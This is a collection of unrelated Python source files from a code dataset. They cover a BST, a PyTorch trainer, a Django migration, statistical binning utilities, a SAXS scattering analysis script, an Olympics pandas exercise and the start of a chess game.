transformation_icp, information_icp, uncertain = False))
else: # loop closure case
pose_graph.edges.append(
PoseGraphEdge(source_id, target_id,
transformation_icp, information_icp, uncertain = True))
print("Optimizing PoseGraph ...")
option = GlobalOptimizationOption(
max_correspondence_distance = 0.03,
edge_prune_threshold = 0.25,
reference_node = 0)
global_optimization(pose_graph,
GlobalOptimizationLevenbergMarquardt(),
GlobalOptimizationConvergenceCriteria(), option)
print("Transform points and display")
for point_id in range(n_pcds):
print(pose_graph.nodes[point_id].pose)
pcds[point_id].transform(pose_graph.nodes[point_id].pose)
draw_geometries(pcds)
|
StarcoderdataPython
|
3561096
|
<reponame>davjohnst/fundamentals<filename>fundamentals/binary_search_tree/binary_search_tree.py
#!/usr/bin/env python
class BSTNode(object):
def __init__(self, parent, left, right, value):
self.parent = parent
self.left = left
self.right = right
self.value = value
class BST(object):
def __init__(self):
self.root = None
def put(self, val):
if self.root is None:
self.root = BSTNode(None, None, None, val)
else:
self._put(val, self.root)
def _put(self, val, current_node):
if val < current_node.value:
if current_node.left is None:
current_node.left = BSTNode(current_node, None, None, val)
else:
self._put(val, current_node.left)
else:
if current_node.right is None:
current_node.right = BSTNode(current_node, None, None, val)
else:
self._put(val, current_node.right)
def contains(self, val):
current_node = self.root
while current_node is not None:
if current_node.value == val:
return True
elif val < current_node.value:
current_node = current_node.left
else:
current_node = current_node.right
return False
def pre_order_traversal(self, func):
self._pre_order_traversal(self.root, func)
def _pre_order_traversal(self, node, func):
if node is not None:
func(node)
if node.left is not None:
self._pre_order_traversal(node.left, func)
if node.right is not None:
self._pre_order_traversal(node.right, func)
def main():
b = BST()
b.put(10)
b.put(4)
b.put(14)
b.put(2)
b.put(1)
def print_val(node):
        print(node.value)
b.pre_order_traversal(print_val)
    print(b.contains(1))
    print(b.contains(3))
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
9619358
|
<filename>1020.py<gh_stars>1-10
n = int(input())
h = int(n // 365)
n -= h * 365
m = int(n // 30)
n -= m * 30
print(h, 'ano(s)')
print(m, 'mes(es)')
print(n, 'dia(s)')
|
StarcoderdataPython
|
4976109
|
import unittest
from cache_gs.utils.timestamp import (base64_to_int, int_to_base64,
section_key_hash)
class TestTimeStamp(unittest.TestCase):
def test_base64(self):
b = int_to_base64(10)
i = base64_to_int(b)
self.assertEqual(10, i)
    def test_length(self):
i = 1
len_base64 = len(int_to_base64(0))
igual = True
last = 2**32
while i <= last and igual:
igual = len(int_to_base64(i)) == len_base64
i *= 2
self.assertTrue(igual)
def test_section_key_hash(self):
hash = section_key_hash('section', 'key')
self.assertIsNotNone(hash)
|
StarcoderdataPython
|
12858804
|
import numpy as np
import torch
from torchvision.utils import make_grid
from base import BaseTrainer
from utils import inf_loop, MetricTracker, confusion_matrix_image
import copy
import sys
import time
from model.metric import Accuracy, TopkAccuracy
def get_top_k(x, ratio):
"""it will sample the top 1-ratio of the samples."""
x_data = x.view(-1)
x_len = x_data.nelement()
top_k = max(1, int(x_len * (1 - ratio)))
# get indices and the corresponding values
if top_k == 1:
_, selected_indices = torch.max(x_data.abs(), dim=0, keepdim=True)
else:
_, selected_indices = torch.topk(
x_data.abs(), top_k, largest=True, sorted=False
)
return x_data[selected_indices], selected_indices
def get_mask(flatten_arr, indices):
mask = torch.zeros_like(flatten_arr)
mask[indices] = 1
mask = mask.bool()
return mask.float(), (~mask).float()
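# Hedged usage sketch (assumption: these helpers are intended for tensor/gradient
# sparsification, but the trainer below does not call them; this function only shows how
# they compose).
def topk_sparsify_example(x, ratio=0.9):
    """Zero out all but the largest-magnitude (1 - ratio) fraction of entries of ``x``."""
    values, indices = get_top_k(x, ratio)
    keep_mask, _ = get_mask(x.view(-1), indices)
    return (x.view(-1) * keep_mask).view_as(x)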
class Trainer(BaseTrainer):
"""
Trainer class
"""
def __init__(self, model, criterion, metric_ftns, optimizer, config, data_loader,
valid_data_loader=None, lr_scheduler=None, len_epoch=None):
super().__init__(model, criterion, metric_ftns, optimizer, config)
self.config = config
self.data_loader = data_loader
if len_epoch is None:
# epoch-based training
self.len_epoch = len(self.data_loader)
else:
# iteration-based training
self.data_loader = inf_loop(data_loader)
self.len_epoch = len_epoch
self.valid_data_loader = valid_data_loader
self.do_validation = self.valid_data_loader is not None
self.lr_scheduler = lr_scheduler
self.log_step = int(np.sqrt(data_loader.batch_size))
self.deployed_model = copy.deepcopy(self.model)
self.init_model = copy.deepcopy(self.model)
self.init_model.eval()
self.deployed_model.eval()
self.accuracy = Accuracy()
self.topkaccuracy = TopkAccuracy()
self.train_metrics = MetricTracker('loss', *[m.__name__ for m in self.metric_ftns], writer=self.writer)
self.valid_metrics = MetricTracker('loss', *[m.__name__ for m in self.metric_ftns], writer=self.writer)
def _train_epoch(self, epoch):
"""
Training logic for an epoch
:param epoch: Integer, current training epoch.
:return: A log that contains average loss and metric in this epoch.
"""
start = time.time()
self.model.train()
total_batch = 0
self.train_metrics.reset()
training_time = 0
for batch_idx, (data, target) in enumerate(self.data_loader):
data, target = data.to(self.device), target.to(self.device)
batch_start = time.time()
self.optimizer.zero_grad()
output = self.model(data)
loss = self.criterion(output, target)
loss.backward()
self.optimizer.step()
training_time += time.time() - batch_start
self.writer.set_step((epoch - 1) * self.len_epoch + batch_idx)
self.train_metrics.update('loss', loss.item())
for met in self.metric_ftns:
self.train_metrics.update(met.__name__, met(output, target))
total_batch += time.time() - batch_start
if batch_idx % self.log_step == 0:
self.logger.info('Train Epoch: {} {} Loss: {:.6f} Time per batch (ms) {}'.format(
epoch,
self._progress(batch_idx),
loss.item(), total_batch * 1000 / (batch_idx + 1)))
# self.writer.add_image('input', make_grid(data.cpu(), nrow=8, normalize=True))
# self.writer.add_figure('confusion_matrix', confusion_matrix_image(output, target))
# valid_log = self._valid_deployed(batch_idx)
# print logged informations to the screen
# for key, value in valid_log.items():
# self.logger.info('Valid deployed {:15s}: {}'.format(str(key), value))
if batch_idx == self.len_epoch:
break
log = self.train_metrics.result()
if self.do_validation:
val_log = self._valid_epoch(epoch)
log.update(**{'val_' + k: v for k, v in val_log.items()})
log['time (sec)'] = time.time() - start
log['training_time'] = training_time
if self.lr_scheduler is not None:
self.lr_scheduler.step()
return log
def _valid_epoch(self, epoch):
"""
Validate after training an epoch
:param epoch: Integer, current training epoch.
:return: A log that contains information about validation
"""
self.model.eval()
self.valid_metrics.reset()
        avg_loss = 0
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (data, target) in enumerate(self.valid_data_loader):
data, target = data.to(self.device), target.to(self.device)
output = self.model(data)
loss = self.criterion(output, target)
avg_loss += loss.item()/len(self.valid_data_loader)
pred = torch.argmax(output, dim=1)
correct += torch.sum(pred == target).item()
total += len(target)
self.writer.set_step(epoch, 'valid')
self.writer.add_scalar('loss', avg_loss)
self.writer.add_scalar('accuracy', correct/total)
# self.writer.add_image('input', make_grid(data.cpu(), nrow=8, normalize=True))
# self.writer.add_figure('confusion_matrix', confusion_matrix_image(output, target))
# add histogram of model parameters to the tensorboard
# for name, p in self.model.named_parameters():
# self.writer.add_histogram(name, p, bins='auto')
return self.valid_metrics.result()
def _valid_deployed(self, batch):
"""
Validate after training a batch
:param epoch: Integer, current training epoch.
:return: A log that contains information about validation
"""
self.deployed_model.eval()
self.valid_metrics.reset()
with torch.no_grad():
for batch_idx, (data, target) in enumerate(self.valid_data_loader):
data, target = data.to(self.device), target.to(self.device)
                output = self.deployed_model(data)
loss = self.criterion(output, target)
self.writer.set_step((batch - 1) * len(self.valid_data_loader) + batch_idx*len(target), 'valid')
self.valid_metrics.update('loss', loss.item())
for met in self.metric_ftns:
                    self.valid_metrics.update(met.__name__, met(output, target))
# self.writer.add_image('input', make_grid(data.cpu(), nrow=8, normalize=True))
# self.writer.add_figure('confusion_matrix', confusion_matrix_image(output, target))
return self.valid_metrics.result()
def _progress(self, batch_idx):
base = '[{}/{} ({:.0f}%)]'
if hasattr(self.data_loader, 'n_samples'):
current = batch_idx * self.data_loader.batch_size
total = self.data_loader.n_samples
else:
current = batch_idx
total = self.len_epoch
return base.format(current, total, 100.0 * current / total)
|
StarcoderdataPython
|
4811873
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" test syntax for logic expression """
import mindspore.nn as nn
from mindspore import context
context.set_context(mode=context.GRAPH_MODE)
class IdentityIsNot(nn.Cell):
def __init__(self, x, y):
super(IdentityIsNot, self).__init__()
self.x = x
self.y = y
def construct(self):
in_v = self.x is not self.y
return in_v
def test_ms_syntax_operator_int_is_not_int():
net = IdentityIsNot(1, 2)
ret = net()
print(ret)
def test_ms_syntax_operator_int_is_not_none():
net = IdentityIsNot(1, None)
ret = net()
print(ret)
def test_ms_syntax_operator_int_is_not_true():
net = IdentityIsNot(1, True)
ret = net()
print(ret)
def test_ms_syntax_operator_bool_is_not_none():
net = IdentityIsNot(True, None)
ret = net()
print(ret)
def test_ms_syntax_operator_bool_is_not_false():
net = IdentityIsNot(True, False)
ret = net()
print(ret)
|
StarcoderdataPython
|
6677462
|
# Generated by Django 2.2 on 2019-04-17 13:45
from django.conf import settings
import django.contrib.auth.models
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('user_id', models.AutoField(primary_key=True, serialize=False)),
('username', models.CharField(max_length=60, unique=True)),
('first_name', models.CharField(max_length=60)),
('last_name', models.CharField(blank=True, max_length=80, null=True)),
('email', models.CharField(max_length=120)),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='Group',
fields=[
('group_id', models.AutoField(primary_key=True, serialize=False)),
('group_name', models.CharField(max_length=60, unique=True)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Movie',
fields=[
('movie_id', models.AutoField(primary_key=True, serialize=False)),
('title', models.CharField(max_length=100)),
('slug', models.SlugField(max_length=100)),
('rated', models.CharField(blank=True, choices=[('G', 'G'), ('PG', 'PG'), ('PG-13', 'PG-13'), ('R', 'R'), ('NC-17', 'NC-17')], default='PG-13', max_length=5, null=True)),
('released', models.DateField()),
('runtime_minutes', models.IntegerField()),
('genre', models.CharField(blank=True, max_length=20, null=True)),
('director', models.CharField(blank=True, max_length=80, null=True)),
('plot', models.TextField(blank=True, null=True)),
('poster_link', models.CharField(blank=True, max_length=250, null=True)),
('imdb_rating', models.FloatField(blank=True, null=True)),
('rt_rating', models.IntegerField(blank=True, null=True)),
('added_to_db', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Rating',
fields=[
('rating_id', models.AutoField(primary_key=True, serialize=False)),
('rating', models.FloatField()),
('comment', models.TextField(blank=True, null=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('movie', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ratings', to='ratings.Movie')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ratings', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Invitation',
fields=[
('invitation_id', models.AutoField(primary_key=True, serialize=False)),
('status', models.CharField(choices=[('sent', 'sent'), ('ignored', 'ignored')], default='sent', max_length=8)),
('sent', models.DateTimeField(auto_now_add=True)),
('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invitations_to_join', to='ratings.Group')),
('receiver', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='received_invitations', to=settings.AUTH_USER_MODEL)),
('sender', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sent_invitations', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='GroupAdminMember',
fields=[
('group_admin_id', models.AutoField(primary_key=True, serialize=False)),
('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='ratings.Group')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='user',
name='group',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='users', to='ratings.Group'),
),
migrations.AddField(
model_name='user',
name='groups',
field=models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups'),
),
migrations.AddField(
model_name='user',
name='user_permissions',
field=models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions'),
),
]
|
StarcoderdataPython
|
11312560
|
<gh_stars>1-10
from django.views.decorators.csrf import csrf_exempt
from rest_framework.generics import GenericAPIView
from rest_framework.response import Response
from rest_framework import status
from glbl.serializers import ConfigSerializer
from glbl.models import GlobalConfig
class ConfigView(GenericAPIView):
serializer_class = ConfigSerializer
@csrf_exempt
def get(self, request):
r = GlobalConfig().get_config()
if r:
return Response(r, status=status.HTTP_200_OK)
else:
return Response(
{"error": "configuration not found"}, status=status.HTTP_404_NOT_FOUND
)
@csrf_exempt
def post(self, request):
serializer = ConfigSerializer(data=request.data)
if serializer.is_valid():
if GlobalConfig.update_config(request.data):
return Response({"acknowledge": True}, status=status.HTTP_200_OK)
else:
return Response(
{"acknowledge": False, "error": "data not accepted"},
status=status.HTTP_200_OK,
)
|
StarcoderdataPython
|
179600
|
'''
TODO:
Median trimmer
'''
import numpy as np
def mad(arr,axis=None):
mid = np.median(arr,axis=axis)
return np.median(abs(arr-mid),axis=axis)
def bin_median(x,y,nbin):
binsize = (x.max()-x.min()) / (2*nbin)
bin_centers = np.linspace(x.min()+binsize,x.max()-binsize,nbin)
binned = np.empty(nbin)
error = np.empty(nbin)
for c in range(bin_centers.size):
mask = (x >= bin_centers[c]-binsize) & (x <= bin_centers[c]+binsize)
binned[c] = np.median(y[mask])
error[c] = np.std(y[mask])/np.sqrt(np.sum(mask))
return bin_centers,binned,error
def bin_mean(x,y,nbin):
binsize = (x.max()-x.min()) / (2*nbin)
bin_centers = np.linspace(x.min()+binsize,x.max()-binsize,nbin)
binned = np.empty(nbin)
error = np.empty(nbin)
for c in range(bin_centers.size):
mask = (x >= bin_centers[c]-binsize) & (x <= bin_centers[c]+binsize)
binned[c] = np.mean(y[mask])
error[c] = np.std(y[mask])/np.sqrt(np.sum(mask))
return bin_centers,binned,error
def bin_sum(data, nbin):
binsize = (data.max()-data.min()) / (2*nbin)
bin_centers = np.linspace(data.min()+binsize, data.max()-binsize, nbin)
binned = np.empty(nbin)
for c in range(bin_centers.size):
mask = (data >= bin_centers[c]-binsize) & (data <= bin_centers[c] + binsize)
binned[c] = np.sum(mask)
return bin_centers, binned
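# Hedged usage sketch (illustrative values only): binning a noisy sine curve with bin_median;
# bin_mean and bin_sum follow the same calling convention.
def _binning_example(nbin=20):
    x = np.linspace(0.0, 10.0, 500)
    y = np.sin(x) + np.random.normal(scale=0.1, size=x.size)
    centers, med, err = bin_median(x, y, nbin)
    return centers, med, err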
def csmooth(x, y, interval, eval=None):
if eval is None:
eval = x
n_points = np.zeros(eval.size)
sums = np.zeros(eval.size)
for i in range(y.size):
mask = (x > x[i]) & (x < x[i]+interval)
if np.sum(mask) > 4:
p = np.polyfit(x[mask], y[mask], 3)
eval_mask = (eval > x[i]) & (eval < x[i]+interval)
sums[eval_mask] += np.polyval(p, eval[eval_mask])
n_points[eval_mask] += 1
n_points[n_points == 0] = 1
return sums/n_points
def jackknife_variance(func,data,N=None,args=()):
estimate = func(data,*args)
if N is None:
N = data.size
omit_points = np.arange(N)
else:
        omit_points = np.random.randint(0, data.size, N)
other_estimates = np.empty(N)
for i in range(N):
other_estimates[i] = func(np.delete(data,i),*args)
return (data.size-1)/N * np.sum((estimate-other_estimates)**2)
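# Hedged usage sketch (illustrative only): for the sample mean of Gaussian data, the full
# leave-one-out jackknife variance should be close to var(data, ddof=1) / n.
def _jackknife_example(n=200):
    data = np.random.normal(loc=0.0, scale=1.0, size=n)
    jk_var = jackknife_variance(np.mean, data)
    naive_var = data.var(ddof=1) / data.size
    return jk_var, naive_var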
'''
under construction
'''
def median_filter(x,y,width=1):
lbound = np.zeros(y.size)
ubound = np.zeros(x.size)
cen = np.zeros(x.size)
for i in range(y.size):
lo = max(i-width,0)
hi = min(i+width,y.size)
tsec = x[lo:hi]
fsec = y[lo:hi]
fitmid = np.polyval(np.polyfit(tsec, fsec, 2), tsec)
normid = np.median(fsec)
mad = min(np.median(abs(fsec-fitmid)), np.median(abs(fsec-normid)))
cen[i] = normid
sigma = 1.4826*mad
ubound[i] = normid+3*sigma
lbound[i] = normid-3*sigma
from matplotlib import pyplot as plt
plt.plot(x,lbound,'g-')
plt.plot(x,ubound,'g-')
plt.plot(x,cen,'b-')
#plt.plot(x,y,'k.')
plt.ylim(y.min(),y.max())
plt.show()
exit()
mask = ((y < ubound) & (y > lbound))
return x[mask],y[mask]
'''
Median filter test code
'''
if __name__ == '__main__':
import os
from astropy.io import fits
os.chdir('/home/ben/research/kepler_llc/007500161')
files = [f for f in os.listdir('.') if f.endswith('_llc.fits')]
contents = fits.open(files[0])[1].data
x = contents['TIME']
y = contents['PDCSAP_FLUX']
mask = np.invert(np.isnan(x) | np.isnan(y))
x = x[mask]
y = y[mask]
median_filter(x,y,11)
|
StarcoderdataPython
|
6422674
|
# --------------
#Importing header files
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#Path of the file
data = pd.read_csv(path)
data.rename(columns = {'Total':"Total_Medals"}, inplace = True)
data.head()
#Code starts here
# --------------
#Code starts here
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
data['Better_Event'] = np.where(data['Total_Summer'] > data['Total_Winter'], 'Summer', 'Winter')
data['Better_Event'] = np.where(data['Total_Summer'] == data['Total_Winter'], 'Both', data['Better_Event'])
better_event = data['Better_Event'].value_counts().index.values[0]
print('Better_Event', better_event)
# --------------
#Code starts here
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
top_countries = data[['Country_Name', 'Total_Summer', 'Total_Winter','Total_Medals']]
top_countries= top_countries[:-1]
def top_ten(data, col):
country_list = []
country_list=list((data.nlargest(10,col)['Country_Name']))
return country_list
top_10_summer = top_ten(top_countries,'Total_Summer')
print('Top_10_Summer:\n',top_10_summer,'\n')
top_10_winter = top_ten(top_countries,'Total_Winter')
print('Top_10_Winter:\n', top_10_winter, '\n')
top_10 = top_ten(top_countries,'Total_Medals')
print('Total_Medals:\n',top_10,'\n')
common = list(set(top_10_summer) & set(top_10_winter) & set(top_10))
print('Common Countries :\n',common,'\n')
# --------------
#Code starts here
import matplotlib.pyplot as plt
summer_df=data[data['Country_Name'].isin(top_10_summer)]
winter_df=data[data['Country_Name'].isin(top_10_winter)]
top_df=data[data['Country_Name'].isin(top_10)]
plt.figure(figsize=(20,20))
plt.bar(top_df['Country_Name'], top_df['Total_Medals'])
plt.title('Top 10')
plt.xlabel('Country_Name')
plt.ylabel('Total Medals')
# --------------
#Code starts here
import matplotlib.pyplot as plt
summer_df['Golden_Ratio']=summer_df['Gold_Summer'] / summer_df['Total_Summer']
summer_max_ratio=max(summer_df['Golden_Ratio'])
summer_country_gold=summer_df.loc[summer_df['Golden_Ratio'].idxmax(),'Country_Name']
winter_df['Golden_Ratio']=winter_df['Gold_Winter'] / winter_df['Total_Winter']
winter_max_ratio=max(winter_df['Golden_Ratio'])
winter_country_gold=winter_df.loc[winter_df['Golden_Ratio'].idxmax(),'Country_Name']
top_df['Golden_Ratio'] = top_df['Gold_Total'] / top_df['Total_Medals']
top_max_ratio=max(top_df['Golden_Ratio'])
top_country_gold=top_df.loc[top_df['Golden_Ratio'].idxmax(), 'Country_Name']
# --------------
#Code starts here
data_1 = data[:-1]
data_1['Total_Points'] = data_1['Gold_Total'] * 3 + data_1['Silver_Total'] *2 + data_1['Bronze_Total']*1
most_points = max(data_1['Total_Points'])
best_country = data_1.loc[data_1['Total_Points'].idxmax(), 'Country_Name']
print('The maximum points acheived is ', most_points, 'by',best_country)
# --------------
#Code starts here
best = data[data['Country_Name'] == best_country]
best = best[['Gold_Total', 'Silver_Total', 'Bronze_Total']]
best.plot.bar(stacked = True)
plt.xlabel('United States')
plt.ylabel('Medals')
plt.xticks(rotation = 45)
|
StarcoderdataPython
|
3470850
|
<reponame>matiastang/matias-python<gh_stars>0
#!/usr/bin/python3
#coding=utf-8
def d_debug():
print(__name__)
def d_one():
print('d_one')
def d_two():
print('d_two')
|
StarcoderdataPython
|
3310210
|
<reponame>cristina-mt/biosoft_SAXS
"""
Test code for analysing SAXS data from ESRF
Created on Fri Nov 24 2017
Last modification on Mon Jan 8 2018
version: 0.0
@author: <NAME>
"""
# Import modules and functions
import numpy as np; import matplotlib.pyplot as plt
from scipy import interpolate
from saxs_open_v0 import OpenSAXS, ShowSAXS
from saxs_matrix_v0 import BuildMatrix
from saxs_basic_v0 import Integrate, Filtering, Fitting
# ========================================================================================
# Files to read
filedir = '[Replace with base file directory]'
file_poni = filedir + '[Replace with .poni file]'
file_mask = filedir + '[Replace with mask file]'
file_blank = filedir + '[Replace with .edf file containing the blank]'
file_sample = filedir + '[Replace with .edf file containing the sample]'
# Variables to choose how data is processed
norm_factor = True # Additional normalisation of background image.
# Set to True to extract the value from calibration information in poni file
# Set to False to ignore it (value equals 1)
# Set to a value between 0-1 to adjust manually the value
# Note: It's not clear what is this normalisation, to be checked with Daniel
res_vect = 1 # Resolution of the radial integration, in pixels. Recommended value: 1
a_der = 5. # Width of the gaussian filter used to subtract scattering trendline in radial profile
qmin_pl = 0.05 # Lower limit to fit log(I) = beta*log(q)
qmax_pl = 0.15 # Upper limit
peak_pos0 = 0.3 # Expected position of scattering peak, used for gauss fit
qmin_fg = 0.22 # Lower limit to fit the scattered peak
qmax_fg = 0.38 # Upper limit
# Display 'checkpoints'
checkpoint_0 = 0 # Raw data check
checkpoint_1 = 0 # Background subtraction in 2D image
checkpoint_2 = 0 # Radial profile
# ========================================================================================
# ========================================================================================
# Read files and store content in variables
cal_info = OpenSAXS.read_poni(file_poni)
if file_mask[-3:] == 'edf' : mask = OpenSAXS.read_mask_edf(file_mask)
elif file_mask[-3:] == 'txt' : mask = OpenSAXS.read_mask_txt(file_mask)
img_blank, header_blank = OpenSAXS.read_edf(file_blank)
img_sample, header_sample = OpenSAXS.read_edf(file_sample)
# --------------------------------------------
# CHECKPOINT 0 : Correct reading of raw data.
# Display the input data
if checkpoint_0 == 1:
ShowSAXS.mask(mask) # Shows mask (binary)
ShowSAXS.raw_img(img_blank, vmin = 3, vmax = 8) # Shows blank image
plt.title('...'+file_blank[-30:])
ShowSAXS.raw_img(img_sample, vmin = 3, vmax = 8) # Shows sample image
plt.title('...'+file_sample[-30:])
ShowSAXS.img_wmask(img_sample, mask, vmin = 3, vmax = 8) # Shows overlay mask on sample image
plt.show()
# ========================================================================================
# Variables used for normalisation, obtained from calibration info in poni file
photo_sample = np.float(header_sample.get('Photo'))
monitor_sample = np.float(header_sample.get('Monitor'))
photo_blank = np.float(header_blank.get('Photo'))
monitor_blank = np.float(header_blank.get('Monitor'))
# Choose the given normalisation factor for background (See notes in line ~24 above
if norm_factor == True: abs_corr = (photo_sample/monitor_sample)/(photo_blank/monitor_blank)
elif norm_factor == False: abs_corr = 1.
else: abs_corr = 1.*norm_factor
# Normalise each saxs data and subtract background from sample
img_corr = (img_sample/photo_sample) - (img_blank/photo_blank)*abs_corr
img_corr[mask==1] = -1
# ------------------------------------------------------------
# CHECKPOINT 1: Data normalisation and background subtraction
if checkpoint_1 == 1:
ShowSAXS.raw_img(img_corr, vmin = -9, vmax = -3)
plt.title('Corrected Image sample')
plt.show()
# ========================================================================================
# Build coordinate matrices used for analysis
center, mat_dist = BuildMatrix.distance(img_sample.shape, cal_info) # Distance matrix (in m)
mat_qvalues = BuildMatrix.qvalues(mat_dist, cal_info) # matrix of q values
mat_qvalues[mask == 1] = -1
# Radial integration, the resolution of the qvector [res_vect] is given in pixels,
# needs to be converted to a q value
qdiff = np.abs(mat_qvalues[int(center[0]):,1:] - mat_qvalues[int(center[0]):,:-1])
qmin = np.mean(qdiff[qdiff>0])
qres = res_vect*qmin
# Plots I(q) in loglog scale
radial_profile, q_vector = Integrate.radial(img_corr, mat_qvalues, qres)
radial_profile = np.array(radial_profile)
q_vector = np.array(q_vector)
# ------------------------------------------------------------
# CHECKPOINT 2: Radial profile
if checkpoint_2 == 1:
plt.figure()
plt.loglog(q_vector, radial_profile, c = 'k')
plt.xlabel('q (1/m)')
plt.ylabel ('I(q) (a.u.)')
plt.show()
# ========================================================================================
# Fit line to log(I) = beta*log(q) to extract power-law, in the range qmin_pl, qmax_pl
beta = Fitting.q_powerlaw_lin([qmin_pl, qmax_pl], q_vector, radial_profile)
# Mirror the radial profile, and then apply first derivative of a gaussian as a kernel
# If the kernel is applied with a width large enough, it should subtract the trendline
# Less subjective way of subtracting the 'regular scattering' profile from the scattering peak
# All the interpolated mirrored signals, are in logscale
offset_nan, mirror_qv, mirror_rp = Filtering.mirror_logsignal_1D(q_vector, radial_profile)
interp_mq = np.linspace(mirror_qv[0], mirror_qv[-1], np.power(int(len(mirror_qv)/2),2)) # interpolation, power of 2 for filtering
interp_mr = mirror_rp(interp_mq)
# Choose filter width based on fraction of the one order of magnitude
number_decades = len(np.unique([int(mq) for mq in interp_mq]))
a_scale_der = int(len(interp_mr)/number_decades/a_der)
# Derivate and extract local trendline from radial profile
der_rp = Filtering.gauss_der_1D_fixed(interp_mr, float(a_scale_der))
trendline_rp = -der_rp*(interp_mq)-interp_mq
corr_radial_profile = interp_mr-trendline_rp
# Go back to measured q range, still in logspace
inv_interp_corr_rp = interpolate.interp1d(
interp_mq, corr_radial_profile, kind = 'slinear')
inv_corr_radial_profile = inv_interp_corr_rp(np.log10(q_vector[offset_nan:]))
# Fit scattering peak in logspace (Note: Is it better?)
peak_gfit, error_gfit, rs_gfit = Fitting.qpeak_loggauss(
peak_pos0, [qmin_fg, qmax_fg],
q_vector[offset_nan:],
inv_corr_radial_profile)
peak_pos = np.power(10, peak_gfit[2])
peak_width = np.power(10, 2*np.sqrt(2*np.log(2))*peak_gfit[3])
width_error = 2*np.sqrt(2*np.log(2))*error_gfit[3]
lq = 2*np.pi/peak_pos # Characteristic length of q value
# ========================================================================================
# ========================================================================================
print('Peak position: ' + str(peak_pos) +\
'\nPeak position error: ' + str(error_gfit[2]) +\
'\nPeak width: ' + str(peak_width) +\
'\nPeak width error: ' +str(width_error) +\
'\nR-square Fit: ' +str(rs_gfit) +\
'\nCharacteristic length: ' +str(lq)
)
plt.figure()
plt.loglog(q_vector, radial_profile, c = 'k', label = 'Data')
plt.loglog(q_vector[offset_nan:],
np.power(10, inv_corr_radial_profile),
c = [0.7,0.7,0.7],
label = 'Trendline correction')
plt.loglog([qmin_pl,qmax_pl],
np.min(radial_profile[~np.isnan(radial_profile)])*([qmin_pl, qmax_pl]**beta),
c = 'c',
label = 'Power-law fit')
plt.text(qmax_pl,
2*np.min(radial_profile[~np.isnan(radial_profile)])*qmax_pl**beta,
r'$\beta$ = ' +str(-beta)[:4])
plt.loglog(q_vector[offset_nan:],
np.power(10,Fitting.gauss_fit(
np.log10(q_vector[offset_nan:]),
peak_gfit[0], peak_gfit[1], peak_gfit[2], peak_gfit[3])),
'-', c = 'cyan', lw = 1,
label = 'Gauss Fit Peak')
plt.loglog([peak_pos,peak_pos], [0,1], '--', lw = 1, c = 'm')
plt.text(peak_pos*1.5, np.mean(radial_profile[~np.isnan(radial_profile)]),
'q = ' + str(peak_pos)[:5] +r'nm$^{-1}$'+'\n l = ' + str(lq)[:5] + 'nm')
plt.xlim([3e-2, 5])
plt.ylim([0.9*np.min(radial_profile[~np.isnan(radial_profile)]),
1.1*np.max(radial_profile[~np.isnan(radial_profile)])])
plt.xlabel('q (1/m)')
plt.ylabel ('I(q) (a.u.)')
plt.title('...'+file_sample[-40:-4])
plt.legend()
plt.show()
|
StarcoderdataPython
|
5105060
|
<filename>minimumViableProductBasicGame.py
import itertools
WHITE = "white"
BLACK = "black"
class Game:
    # I've decided that, since the number of pieces is capped but the type of pieces is not (pawn promotions), much of the modularity is already coded to support simply using a dictionary of pieces
def __init__(self):
self.playersturn = BLACK
self.message = "this is where prompts will go"
self.gameboard = {}
self.placePieces()
print("chess program. enter moves in algebraic notation separated by space")
self.main()
def placePieces(self):
for i in range(0,8):
self.gameboard[(i,1)] = Pawn(WHITE,uniDict[WHITE][Pawn],1)
self.gameboard[(i,6)] = Pawn(BLACK,uniDict[BLACK][Pawn],-1)
placers = [Rook,Knight,Bishop,Queen,King,Bishop,Knight,Rook]
for i in range(0,8):
self.gameboard[(i,0)] = placers[i](WHITE,uniDict[WHITE][placers[i]])
